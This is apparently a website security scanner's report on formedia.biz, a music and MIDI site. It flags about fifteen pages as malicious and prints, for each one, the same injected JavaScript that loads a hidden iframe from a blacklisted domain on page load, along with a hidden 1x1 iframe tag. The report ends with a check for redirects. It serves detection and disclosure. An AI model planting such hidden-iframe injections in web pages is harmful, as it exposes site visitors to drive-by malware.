Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=formedia.biz
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://formedia.biz/ | 200 OK Content-Length: 34956 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 24corp-shop.com if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function showBrowVer() { var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://24corp-shop.com'; js_kod2.width = '180px'; js_kod2.height = '200px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } Decoded script: function showBrowVer() { var divTag = document.createElement("div"); divTag.id = "dt"; document.body.appendChild(divTag); var js_kod2 = document.createElement("iframe"); js_kod2.src = "http://24corp-shop.com"; js_kod2.width = "180px"; js_kod2.height = "200px"; js_kod2.setAttribute("style", "visibility:hidden"); document.getElementById("dt").appendChild(js_kod2); } Malicious iFrame found. size: 1x1 style: hidden src: http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg This URL is marked by Google as suspicious <iframe src="http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg" width=1 height=1 style="visibility: hidden"> | ||
http://formedia.biz/podklyuchenie-midi/600-.html | 200 OK Content-Length: 22812 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 24corp-shop.com if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function showBrowVer() { var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://24corp-shop.com'; js_kod2.width = '180px'; js_kod2.height = '200px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } Decoded script: function showBrowVer() { var divTag = document.createElement("div"); divTag.id = "dt"; document.body.appendChild(divTag); var js_kod2 = document.createElement("iframe"); js_kod2.src = "http://24corp-shop.com"; js_kod2.width = "180px"; js_kod2.height = "200px"; js_kod2.setAttribute("style", "visibility:hidden"); document.getElementById("dt").appendChild(js_kod2); } Malicious iFrame found. size: 1x1 style: hidden src: http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg This URL is marked by Google as suspicious <iframe src="http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg" width=1 height=1 style="visibility: hidden"> | ||
http://formedia.biz/cifrovye-mikshery/32-.html | 200 OK Content-Length: 22309 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 24corp-shop.com if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function showBrowVer() { var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://24corp-shop.com'; js_kod2.width = '180px'; js_kod2.height = '200px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } Decoded script: function showBrowVer() { var divTag = document.createElement("div"); divTag.id = "dt"; document.body.appendChild(divTag); var js_kod2 = document.createElement("iframe"); js_kod2.src = "http://24corp-shop.com"; js_kod2.width = "180px"; js_kod2.height = "200px"; js_kod2.setAttribute("style", "visibility:hidden"); document.getElementById("dt").appendChild(js_kod2); } Malicious iFrame found. size: 1x1 style: hidden src: http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg This URL is marked by Google as suspicious <iframe src="http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg" width=1 height=1 style="visibility: hidden"> | ||
http://formedia.biz/muzykalnye-terminy/10-esli-sekvensor-yavlyaetsya-masterom-to-pri-vybore-odnoy-iz-nih-sekvensor-posylaet-ritm-mashinke.html | 200 OK Content-Length: 22223 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 24corp-shop.com if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function showBrowVer() { var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://24corp-shop.com'; js_kod2.width = '180px'; js_kod2.height = '200px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } Decoded script: function showBrowVer() { var divTag = document.createElement("div"); divTag.id = "dt"; document.body.appendChild(divTag); var js_kod2 = document.createElement("iframe"); js_kod2.src = "http://24corp-shop.com"; js_kod2.width = "180px"; js_kod2.height = "200px"; js_kod2.setAttribute("style", "visibility:hidden"); document.getElementById("dt").appendChild(js_kod2); } Malicious iFrame found. size: 1x1 style: hidden src: http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg This URL is marked by Google as suspicious <iframe src="http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg" width=1 height=1 style="visibility: hidden"> | ||
http://formedia.biz/muzyka-i-my/41-.html | 200 OK Content-Length: 22727 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 24corp-shop.com if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function showBrowVer() { var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://24corp-shop.com'; js_kod2.width = '180px'; js_kod2.height = '200px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } Decoded script: function showBrowVer() { var divTag = document.createElement("div"); divTag.id = "dt"; document.body.appendChild(divTag); var js_kod2 = document.createElement("iframe"); js_kod2.src = "http://24corp-shop.com"; js_kod2.width = "180px"; js_kod2.height = "200px"; js_kod2.setAttribute("style", "visibility:hidden"); document.getElementById("dt").appendChild(js_kod2); } Malicious iFrame found. size: 1x1 style: hidden src: http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg This URL is marked by Google as suspicious <iframe src="http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg" width=1 height=1 style="visibility: hidden"> | ||
http://formedia.biz/zvukosnimateli-emg/678-.html | 200 OK Content-Length: 22100 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 24corp-shop.com if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function showBrowVer() { var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://24corp-shop.com'; js_kod2.width = '180px'; js_kod2.height = '200px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } Decoded script: function showBrowVer() { var divTag = document.createElement("div"); divTag.id = "dt"; document.body.appendChild(divTag); var js_kod2 = document.createElement("iframe"); js_kod2.src = "http://24corp-shop.com"; js_kod2.width = "180px"; js_kod2.height = "200px"; js_kod2.setAttribute("style", "visibility:hidden"); document.getElementById("dt").appendChild(js_kod2); } Malicious iFrame found. size: 1x1 style: hidden src: http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg This URL is marked by Google as suspicious <iframe src="http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg" width=1 height=1 style="visibility: hidden"> | ||
http://formedia.biz/muzyka-i-my/78-.html | 200 OK Content-Length: 21782 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 24corp-shop.com if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function showBrowVer() { var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://24corp-shop.com'; js_kod2.width = '180px'; js_kod2.height = '200px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } Decoded script: function showBrowVer() { var divTag = document.createElement("div"); divTag.id = "dt"; document.body.appendChild(divTag); var js_kod2 = document.createElement("iframe"); js_kod2.src = "http://24corp-shop.com"; js_kod2.width = "180px"; js_kod2.height = "200px"; js_kod2.setAttribute("style", "visibility:hidden"); document.getElementById("dt").appendChild(js_kod2); } Malicious iFrame found. size: 1x1 style: hidden src: http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg This URL is marked by Google as suspicious <iframe src="http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg" width=1 height=1 style="visibility: hidden"> | ||
http://formedia.biz/muzyka-drevnih/7-kommentarii-midi-v-detalyah.-sistemnye-soobscheniya.html | 200 OK Content-Length: 22680 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 24corp-shop.com if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function showBrowVer() { var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://24corp-shop.com'; js_kod2.width = '180px'; js_kod2.height = '200px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } Decoded script: function showBrowVer() { var divTag = document.createElement("div"); divTag.id = "dt"; document.body.appendChild(divTag); var js_kod2 = document.createElement("iframe"); js_kod2.src = "http://24corp-shop.com"; js_kod2.width = "180px"; js_kod2.height = "200px"; js_kod2.setAttribute("style", "visibility:hidden"); document.getElementById("dt").appendChild(js_kod2); } Malicious iFrame found. size: 1x1 style: hidden src: http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg This URL is marked by Google as suspicious <iframe src="http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg" width=1 height=1 style="visibility: hidden"> | ||
http://formedia.biz/muzykalnye-fantazii/847-.html | 200 OK Content-Length: 21874 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 24corp-shop.com if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function showBrowVer() { var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://24corp-shop.com'; js_kod2.width = '180px'; js_kod2.height = '200px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } Decoded script: function showBrowVer() { var divTag = document.createElement("div"); divTag.id = "dt"; document.body.appendChild(divTag); var js_kod2 = document.createElement("iframe"); js_kod2.src = "http://24corp-shop.com"; js_kod2.width = "180px"; js_kod2.height = "200px"; js_kod2.setAttribute("style", "visibility:hidden"); document.getElementById("dt").appendChild(js_kod2); } Malicious iFrame found. size: 1x1 style: hidden src: http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg This URL is marked by Google as suspicious <iframe src="http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg" width=1 height=1 style="visibility: hidden"> | ||
http://formedia.biz/muzykalnoe-vospriyatie/27-.html | 200 OK Content-Length: 22576 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 24corp-shop.com if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function showBrowVer() { var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://24corp-shop.com'; js_kod2.width = '180px'; js_kod2.height = '200px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } Decoded script: function showBrowVer() { var divTag = document.createElement("div"); divTag.id = "dt"; document.body.appendChild(divTag); var js_kod2 = document.createElement("iframe"); js_kod2.src = "http://24corp-shop.com"; js_kod2.width = "180px"; js_kod2.height = "200px"; js_kod2.setAttribute("style", "visibility:hidden"); document.getElementById("dt").appendChild(js_kod2); } Malicious iFrame found. size: 1x1 style: hidden src: http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg This URL is marked by Google as suspicious <iframe src="http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg" width=1 height=1 style="visibility: hidden"> | ||
http://formedia.biz/muzykalnoe-vospriyatie/75-.html | 200 OK Content-Length: 22090 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 24corp-shop.com if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function showBrowVer() { var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://24corp-shop.com'; js_kod2.width = '180px'; js_kod2.height = '200px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } Decoded script: function showBrowVer() { var divTag = document.createElement("div"); divTag.id = "dt"; document.body.appendChild(divTag); var js_kod2 = document.createElement("iframe"); js_kod2.src = "http://24corp-shop.com"; js_kod2.width = "180px"; js_kod2.height = "200px"; js_kod2.setAttribute("style", "visibility:hidden"); document.getElementById("dt").appendChild(js_kod2); } Malicious iFrame found. size: 1x1 style: hidden src: http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg This URL is marked by Google as suspicious <iframe src="http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg" width=1 height=1 style="visibility: hidden"> | ||
http://formedia.biz/2014/12/ | 404 Not Found Content-Length: 16373 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 24corp-shop.com if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function showBrowVer() { var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://24corp-shop.com'; js_kod2.width = '180px'; js_kod2.height = '200px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } Decoded script: function showBrowVer() { var divTag = document.createElement("div"); divTag.id = "dt"; document.body.appendChild(divTag); var js_kod2 = document.createElement("iframe"); js_kod2.src = "http://24corp-shop.com"; js_kod2.width = "180px"; js_kod2.height = "200px"; js_kod2.setAttribute("style", "visibility:hidden"); document.getElementById("dt").appendChild(js_kod2); } Malicious iFrame found. size: 1x1 style: hidden src: http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg This URL is marked by Google as suspicious <iframe src="http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg" width=1 height=1 style="visibility: hidden"> | ||
http://formedia.biz/2014/11/ | 404 Not Found Content-Length: 16337 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 24corp-shop.com if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function showBrowVer() { var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://24corp-shop.com'; js_kod2.width = '180px'; js_kod2.height = '200px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } Decoded script: function showBrowVer() { var divTag = document.createElement("div"); divTag.id = "dt"; document.body.appendChild(divTag); var js_kod2 = document.createElement("iframe"); js_kod2.src = "http://24corp-shop.com"; js_kod2.width = "180px"; js_kod2.height = "200px"; js_kod2.setAttribute("style", "visibility:hidden"); document.getElementById("dt").appendChild(js_kod2); } Malicious iFrame found. size: 1x1 style: hidden src: http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg This URL is marked by Google as suspicious <iframe src="http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg" width=1 height=1 style="visibility: hidden"> | ||
http://formedia.biz/2014/10/ | 404 Not Found Content-Length: 16400 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 24corp-shop.com if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function showBrowVer() { var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://24corp-shop.com'; js_kod2.width = '180px'; js_kod2.height = '200px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } Decoded script: function showBrowVer() { var divTag = document.createElement("div"); divTag.id = "dt"; document.body.appendChild(divTag); var js_kod2 = document.createElement("iframe"); js_kod2.src = "http://24corp-shop.com"; js_kod2.width = "180px"; js_kod2.height = "200px"; js_kod2.setAttribute("style", "visibility:hidden"); document.getElementById("dt").appendChild(js_kod2); } Malicious iFrame found. size: 1x1 style: hidden src: http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg This URL is marked by Google as suspicious <iframe src="http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg" width=1 height=1 style="visibility: hidden"> | ||
http://formedia.biz/2014/09/ | 404 Not Found Content-Length: 16333 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: 24corp-shop.com if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function showBrowVer() { var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://24corp-shop.com'; js_kod2.width = '180px'; js_kod2.height = '200px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } Decoded script: function showBrowVer() { var divTag = document.createElement("div"); divTag.id = "dt"; document.body.appendChild(divTag); var js_kod2 = document.createElement("iframe"); js_kod2.src = "http://24corp-shop.com"; js_kod2.width = "180px"; js_kod2.height = "200px"; js_kod2.setAttribute("style", "visibility:hidden"); document.getElementById("dt").appendChild(js_kod2); } Malicious iFrame found. size: 1x1 style: hidden src: http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg This URL is marked by Google as suspicious <iframe src="http://wite.palmbeachgoldmine.com/?phpssesid=njrmnrudmhvjfipgkuxdskvbm07pthnjko2ahe6jvg|mme5mzq3oduyngi3n2u2njlkmgfmnza3oguxzdhhyzg" width=1 height=1 style="visibility: hidden"> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: formedia.biz
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 30 Jan 2015 17:02:26 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=CP1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=mc4dqvooattitmk3lrffk8aju1; path=/
Set-Cookie: dle_user_id=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.formedia.biz; httponly
Set-Cookie: dle_password=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.formedia.biz; httponly
Set-Cookie: dle_hash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.formedia.biz; httponly
X-Powered-By: PHP/5.3.27
GET / HTTP/1.1
Host: formedia.biz
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 30 Jan 2015 17:02:26 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=CP1251
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=mc4dqvooattitmk3lrffk8aju1; path=/
Set-Cookie: dle_user_id=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.formedia.biz; httponly
Set-Cookie: dle_password=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.formedia.biz; httponly
Set-Cookie: dle_hash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.formedia.biz; httponly
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: formedia.biz
Referer: http://www.google.com/search?q=formedia.biz
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: formedia.biz
Referer: http://www.google.com/search?q=formedia.biz
Result:
The result is similar to the first query. There are no suspicious redirects found.